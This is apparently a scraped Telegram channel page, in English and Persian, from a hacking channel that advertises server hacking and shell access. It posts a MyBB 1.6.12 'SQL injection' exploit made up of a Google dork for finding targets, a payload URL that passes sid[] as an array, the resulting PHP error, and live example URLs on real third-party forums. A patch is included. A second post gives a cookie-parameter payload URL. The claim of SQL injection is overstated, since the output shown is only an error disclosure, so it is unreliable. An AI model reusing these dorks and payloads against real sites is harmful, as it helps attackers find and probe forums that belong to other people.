0Day.Today | Learn Exploit | Zero World | Dark web

0Day.Today | Learn Exploit | Zero World | Dark web |

#Exploit - #Dork - #MYBB
——————————-
[+] Exploit Name: MYBB 1.6.12 search.php Sql injection
[+] Google Dork : intext:"powered by Mybb"
[+] Version: 1.6.12
اسیب پذیری sql در MYBB 1.6.12
——————————-
|~Exploit :
بخش زیر رو به URL سایت اضافه کنید.

search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Demo :

http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

|~Error :

Warning [2] mysqli_real_escape_string() expects parameter 2 to be string,
array given - Line: 874 - File: inc/db_mysqli.php PHP 5.4.19

-1~dotdeb.1 (Linux)

|~Exm :

1) http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
2) http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
3) http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=

***************************************************

[+] How To patch :

فایل search.php رو باز کنید و قسمت زیر رو پیدا کنید:
$sid = $db->escape_string($mybb->input['sid']);

و به کد زیر تغییر دهید :
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);
=======================================
T.me/LearnExploit
0Day.Today Boy's

0Day.Today | Learn Exploit | Zero World | Dark web |

☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut

❗️０ｄａｙｉｓｔｏｄａｙ❗️

تبلیغات : @LearnExploitAds

IR0Day.Today

819 viewsedited 21:39

0Day.Today | Learn Exploit | Zero World | Dark web |

MyBB Exploit

/index.php?_COOKIE=%C3%A2%E2%82%AC%C5%A0

#mybb #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

✍1👍1👎1

1.89K views16:15

About

Blog

Apps

Platform